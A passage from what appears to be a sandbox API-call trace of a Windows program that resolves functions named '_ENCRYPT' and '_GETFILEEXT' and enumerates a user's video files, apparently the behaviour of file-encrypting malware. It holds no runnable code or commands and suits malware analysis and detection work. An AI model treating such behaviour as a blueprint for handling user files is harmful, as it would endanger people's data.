dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0198.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0198.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0198.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0198.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0198.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0198.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0198.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.770] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0198.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0198.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0198.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0198.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0198.771] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0198.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0198.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0198.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0198.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0198.771] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0198.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0198.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0198.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0198.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0198.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0198.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0198.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0198.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0198.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0198.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.772] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0198.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0198.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4c8 [0198.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd4c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0198.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0198.773] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0198.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0198.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0198.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0198.773] CloseHandle (hObject=0x158) returned 1 [0198.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0198.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0198.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0198.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0198.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0198.773] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0198.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.774] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0198.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0198.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.774] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.774] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0198.774] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.774] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0198.774] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0198.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.775] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.775] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.775] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.775] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9682a920, ftCreationTime.dwHighDateTime=0x1d5d7dc, ftLastAccessTime.dwLowDateTime=0x6c1ae300, ftLastAccessTime.dwHighDateTime=0x1d5e50b, ftLastWriteTime.dwLowDateTime=0x6c1ae300, ftLastWriteTime.dwHighDateTime=0x1d5e50b, nFileSizeHigh=0x0, nFileSizeLow=0x1811c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="448L4fbhgcrO5YwRMWv_.avi", cAlternateFileName="448L4F~1.AVI")) returned 0x90add8 [0198.775] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0198.775] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.775] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9682a920, ftCreationTime.dwHighDateTime=0x1d5d7dc, ftLastAccessTime.dwLowDateTime=0x6c1ae300, ftLastAccessTime.dwHighDateTime=0x1d5e50b, ftLastWriteTime.dwLowDateTime=0x6c1ae300, ftLastWriteTime.dwHighDateTime=0x1d5e50b, nFileSizeHigh=0x0, nFileSizeLow=0x1811c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="448L4fbhgcrO5YwRMWv_.avi", cAlternateFileName="448L4F~1.AVI")) returned 0x90add8 [0198.775] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0198.776] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="paZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aZzgTTH\\448L4fbhgcrO5YwRMWv_.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.777] CompareStringW 